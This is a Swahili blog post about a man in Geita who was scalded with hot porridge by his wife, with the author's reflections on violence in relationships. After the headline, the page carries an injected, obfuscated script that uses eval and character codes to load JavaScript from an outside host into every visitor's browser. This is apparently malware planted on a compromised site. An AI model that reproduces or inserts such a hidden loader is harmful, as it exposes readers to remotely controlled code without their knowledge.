Mapenzi ni hisia na kila mmoja ana zake. Katika mapenzi au mahusiano cha kuzingatiwa ni hisia na usalama wa mtu uliye naye, mara nyingi matukio madogo madogo ambayo hujirudia rudia mara kwa mara huwa ni kero kwa mwenza na kulekea maamuzi mbalimbali ambapo mengi huwa ya hovyo maumivu mateso hata vifo kwa baadhi ya watu.
Kumekuwa na matukio mengi sana ya kutisha kwa wapenzi ambao walikuwa wakipendana kipindi cha nyuma lakini baadae kutendeana matukio ambatyo ni kutisha mno.
Hivi karibuni limetokea tukio fulani la kikatili huko Geita kijiji cha Rwenge ambapo bwana mmoja aitwaye Lujuo Faustine Mgeta mwenye miaka 28 amejeruhiwa maeneo ya uso baada ya kumwagiwa uji wa moto na mkewe majira ya saa kumi na moja alfajiri akiwa amelala.
Inadaiwa kuwa bwana huyo alimpiga kibao asubuhi ya siku iliyopita na mkewe alifanya hivyo kulipiza hilo japo alimpiga kidogo tu, kwakweli ni ngumu sana kujua kuwa ni kweli sababu kuu ni hiyo ya kumpiga mke kidogo tena vibao viwili tu.
Sijasema kuwa mke kafanya sahihi, lahasha ni vibaya mnoo lakini tukio hili linarudisha kwenye aya kadhaa hapo juu ambapo nimeeleza kuwa matendo mabaya yanayofanyika mara kwa mara huwa ni kero na kupelekea maamuzi hatarishi kama haya.
Hapa haiwezekani kutambua moja kwa moja nini sababu ya msingi ya tukio hilo mpaka uchunguzi wa polisi utakapotimia maana hakuna jambo lisilo na sbabu wala ukweli, tutaujua tu.
Ningependa kushauri kuwa tujitahidi kuwa na tabia ya kuthamini thamani ya wapenzi au watu tulio nao katika mahusiano ili kuepusha matukio ya hatari/ lakini pia tujiepushe kuchukua sheria mkononi hata kama tukikereka kiasi cha juu sana maana kufanya hivyo ni hatari kwa amani yetu na hata usalama wetu.
jamaa Amwagiwa Uji wa Moto Sababu Huweza Kuwa Hii
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Recent Comments